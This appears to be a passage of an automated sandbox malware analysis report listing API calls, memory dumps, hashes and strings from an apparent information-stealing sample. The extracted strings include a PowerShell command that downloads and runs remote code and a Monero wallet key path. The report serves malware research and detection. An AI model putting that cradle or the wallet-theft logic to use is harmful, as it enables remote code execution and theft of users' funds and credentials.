                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: b3b6a20659fed46eef22d82d3441b044428554ccc77982caea0d8c30710789ca
                                    • Instruction ID: 53495c6ae66149299e916ba0afc69e67b4488498e5b74ded6bad61b5c9a156f7
                                    • Opcode Fuzzy Hash: b3b6a20659fed46eef22d82d3441b044428554ccc77982caea0d8c30710789ca
                                    • Instruction Fuzzy Hash: E4311AB4E00209EFDB24CF94D885BAE77F5FF49310F108169E915AB290D778A981DFA0
                                    APIs
                                    • lstrcat.KERNEL32(?,008CE298), ref: 00FB47DB
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4801
                                    • lstrcat.KERNEL32(?,?), ref: 00FB4820
                                    • lstrcat.KERNEL32(?,?), ref: 00FB4834
                                    • lstrcat.KERNEL32(?,008BB958), ref: 00FB4847
                                    • lstrcat.KERNEL32(?,?), ref: 00FB485B
                                    • lstrcat.KERNEL32(?,008CDA80), ref: 00FB486F
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FB8D90: GetFileAttributesA.KERNEL32(00000000,?,00FA1B54,?,?,00FC564C,?,?,00FC0E1F), ref: 00FB8D9F
                                      • Part of subcall function 00FB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FB4580
                                      • Part of subcall function 00FB4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FB4587
                                      • Part of subcall function 00FB4570: wsprintfA.USER32 ref: 00FB45A6
                                      • Part of subcall function 00FB4570: FindFirstFileA.KERNEL32(?,?), ref: 00FB45BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 46411a5afb1e7a41b7a972c40419194012a6298d8d644afb2f3087909cd0101b
                                    • Instruction ID: 3ea9ef3a05f8ed086f97a5cdf852aa1abeef62961dbae1f3ee76420047f1a0d5
                                    • Opcode Fuzzy Hash: 46411a5afb1e7a41b7a972c40419194012a6298d8d644afb2f3087909cd0101b
                                    • Instruction Fuzzy Hash: 983173B690021867DB24F7F0DC85EE973BCAB48700F404599B31596081EE7897C9DF95
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB2D85
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FB2D04
                                    • <, xrefs: 00FB2D39
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FB2CC4
                                    • ')", xrefs: 00FB2CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: add408f62b8ad0cb646d75c514cb2477765c36237dbd05dfd85e1494f7e96bd4
                                    • Instruction ID: 5fb1f2638cbe59c0d03efa8ec98fa6fc889f6ed73f6a5f4359725616ad9edac9
                                    • Opcode Fuzzy Hash: add408f62b8ad0cb646d75c514cb2477765c36237dbd05dfd85e1494f7e96bd4
                                    • Instruction Fuzzy Hash: E4419071D10208EADB18EFA1DCA2FDDB778AF14300F504119E116B7591DF786A4AEF92
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FA9F41
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: 632f54f45bf964beb9efa1fd76b42fecdfbc03b8baef61c8ec2488f19f9bdec0
                                    • Instruction ID: 2544fe42d78896955f3c0b7eaa57d0679ca8df58c72e984d08b4a6d8cca9f709
                                    • Opcode Fuzzy Hash: 632f54f45bf964beb9efa1fd76b42fecdfbc03b8baef61c8ec2488f19f9bdec0
                                    • Instruction Fuzzy Hash: 95613075A00248EFDB24EFA5CD96FED77B9AF45300F008418F9095B581EF78AA05DB52
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,008CDBE0,00000000,00020119,?), ref: 00FB40F4
                                    • RegQueryValueExA.ADVAPI32(?,008CE1C0,00000000,00000000,00000000,000000FF), ref: 00FB4118
                                    • RegCloseKey.ADVAPI32(?), ref: 00FB4122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4147
                                    • lstrcat.KERNEL32(?,008CE3A0), ref: 00FB415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 28a473cef3a0fa433a7f984ca643b699bfa204466829582417da6f73d01d8db6
                                    • Instruction ID: 083c949805f055b8f88049d85d223cf5cb1ae77b36247bd6f0a65adb686fb745
                                    • Opcode Fuzzy Hash: 28a473cef3a0fa433a7f984ca643b699bfa204466829582417da6f73d01d8db6
                                    • Instruction Fuzzy Hash: 13418BB6D001086BDB28EBE0EC46FFD777DBB88300F044559B6265B185EA759BC88BD1
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00FB696C
                                    • sscanf.NTDLL ref: 00FB6999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FB69B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FB69C0
                                    • ExitProcess.KERNEL32 ref: 00FB69DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 19472b6d636382ed16192807107c6ec4848c9ecbaa9f0b846088c41704f5ad14
                                    • Instruction ID: f61cd3c7cfff69a64d9a83a79c8e8cceb7b7db60a10d990c9ff1fb0370b04fbe
                                    • Opcode Fuzzy Hash: 19472b6d636382ed16192807107c6ec4848c9ecbaa9f0b846088c41704f5ad14
                                    • Instruction Fuzzy Hash: 2421EB75D00208ABCF18EFE4E9459EEB7F9FF48300F04852AE416E7244EB349648CB65
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,008BC460,00000000,00020119,?), ref: 00FB7E5E
                                    • RegQueryValueExA.ADVAPI32(?,008CDD20,00000000,00000000,000000FF,000000FF), ref: 00FB7E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00FB7E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 4e9db22c1c4bd21b136671c78b88022f183bafe8c755f3721ce4441db26b2e35
                                    • Instruction ID: 22277289b6c71f9fd7c750f1a9d8da20e3c88c43c2f82cc601961010ab91bf5f
                                    • Opcode Fuzzy Hash: 4e9db22c1c4bd21b136671c78b88022f183bafe8c755f3721ce4441db26b2e35
                                    • Instruction Fuzzy Hash: 8911C1B2A44205EBD714DFC5E849FBBBBB8EF44B01F104129F612AB284D77498008FA1
                                    APIs
                                    • StrStrA.SHLWAPI(008CDFF8,?,?,?,00FB140C,?,008CDFF8,00000000), ref: 00FB926C
                                    • lstrcpyn.KERNEL32(011EAB88,008CDFF8,008CDFF8,?,00FB140C,?,008CDFF8), ref: 00FB9290
                                    • lstrlen.KERNEL32(?,?,00FB140C,?,008CDFF8), ref: 00FB92A7
                                    • wsprintfA.USER32 ref: 00FB92C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: de7c60f1cfe3831629d4278b8059bc41ec479cdcaf2e1bcc11320acebaa024bc
                                    • Instruction ID: 30067f21d0c1a50fef6c87de7cc3f3b8ccc5f1e0eaa45571efcfee7a7ea7c107
                                    • Opcode Fuzzy Hash: de7c60f1cfe3831629d4278b8059bc41ec479cdcaf2e1bcc11320acebaa024bc
                                    • Instruction Fuzzy Hash: 9001CC75940108FFCB18DFECD988EAE7BB9EF48355F108548F9199B204C671AA80DB90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FA12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FA12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FA12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00FA12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 7721b8b26d9e37d95b3ac992cc05401fa0b23572285f24ea8f6970b51ecb128a
                                    • Instruction ID: ee6cb74f5c84941961e0bbe187f6771d87b4428cee682031de767e9bae808047
                                    • Opcode Fuzzy Hash: 7721b8b26d9e37d95b3ac992cc05401fa0b23572285f24ea8f6970b51ecb128a
                                    • Instruction Fuzzy Hash: 9701E1B9A40208BBDB14DFE4E849FAEB7F8EF48701F108169FA159B284D6759A418F50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 0608fbf24f6dcf1b4251c2956662a0eef401c89d9d2208ce63357605f10b1f1d
                                    • Instruction ID: 37a0d908dd8a66a521b059cef00ba6acca67a5c6273a9456adfe96602f7ad92f
                                    • Opcode Fuzzy Hash: 0608fbf24f6dcf1b4251c2956662a0eef401c89d9d2208ce63357605f10b1f1d
                                    • Instruction Fuzzy Hash: 0E41F67150075C9EEB218B25CC85FFB7BFC9B45704F1444E8E98A87182E2759A44EFA0
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FB6663
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB6726
                                    • ExitProcess.KERNEL32 ref: 00FB6755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 2fc4d234e9fb3f47971cd7005b212afe49ae28d85078f39173e1ca3abe4ab9e7
                                    • Instruction ID: 477dc97228ac85054c19e1314198191ae5ea9db2d53fd0befe5080800726962d
                                    • Opcode Fuzzy Hash: 2fc4d234e9fb3f47971cd7005b212afe49ae28d85078f39173e1ca3abe4ab9e7
                                    • Instruction Fuzzy Hash: BF312BB1C01218AADB18EB91DC92FDEB77CAF44300F404199F21A67181DF786B89DF65
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FC0E28,00000000,?), ref: 00FB882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB8836
                                    • wsprintfA.USER32 ref: 00FB8850
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 3c89994d11d78649506e62f3006d0cd8f681bded83a205a7c12d9a35cb2663af
                                    • Instruction ID: 5af89e254f381e5fb544985a83520fbd797dd77e47122f0a15b5cd9947150f55
                                    • Opcode Fuzzy Hash: 3c89994d11d78649506e62f3006d0cd8f681bded83a205a7c12d9a35cb2663af
                                    • Instruction Fuzzy Hash: 7C212EB1A40208AFDB18DFD4ED45FAEBBF8FB48701F104129F615AB284C77999418BA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FB951E,00000000), ref: 00FB8D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB8D62
                                    • wsprintfW.USER32 ref: 00FB8D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: ca8d70c7f6d1aca70a279ef5cd25179fcb6b07ae9887ec0a45dcfb37beb6b539
                                    • Instruction ID: 843712a92f3771ad4efc5c895f903f42fd175b4236d0e589226172303d5693a4
                                    • Opcode Fuzzy Hash: ca8d70c7f6d1aca70a279ef5cd25179fcb6b07ae9887ec0a45dcfb37beb6b539
                                    • Instruction Fuzzy Hash: B3E08670A40208FBC718DBD4E90AE597BF8EF04702F004064FD098B280D9719E409B51
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FAA2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00FAA3FF
                                    • lstrlen.KERNEL32(00000000), ref: 00FAA6BC
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FAA743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 35a573e2f3465c87e0c0ec0a485a503b8025218d58a5020d5ecfe00567ef66d0
                                    • Instruction ID: e82dacf96a732a5e2dca673059bc7573dedb4f759c0857353a809d04989822f3
                                    • Opcode Fuzzy Hash: 35a573e2f3465c87e0c0ec0a485a503b8025218d58a5020d5ecfe00567ef66d0
                                    • Instruction Fuzzy Hash: 69E1F372810108AADB14FBA5DC92EEE733CAF54300F508169F51776491EF386A59EF72
                                    APIs
